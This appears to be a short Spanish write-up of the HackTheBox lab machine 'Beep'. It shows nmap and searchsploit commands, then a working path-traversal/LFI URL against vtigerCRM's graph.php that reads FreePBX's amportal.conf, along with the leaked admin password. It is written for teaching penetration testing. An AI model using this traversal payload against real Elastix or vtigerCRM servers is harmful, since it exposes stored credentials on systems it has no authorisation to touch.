HackTheBox Easy Linux Elastix LFI FreePBX

Beep

Elastix/FreePBX explotado mediante LFI en vtigercrm para leer credenciales del sistema.

cat4clysm

nmap searchsploit curl

root@kali:~$

nmap -sC -sV -p4559,25,3306,80,4190,10000,111,995,110,143,22,4445,443,993 -Pn -n 10.10.10.7 -oN targeted

root@kali:~$

searchsploit elastix
searchsploit -x php/webapps/37637.pl

Explotamos el LFI en vtigercrm para leer amportal.conf:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

user: admin
password: jEhdIekWmdjE

El LFI en Elastix/vtigerCRM expone archivos de configuracion con credenciales en texto claro.
La reutilizacion de credenciales entre servicios es muy comun en sistemas legacy.
Siempre buscar en searchsploit por la version exacta del software instalado.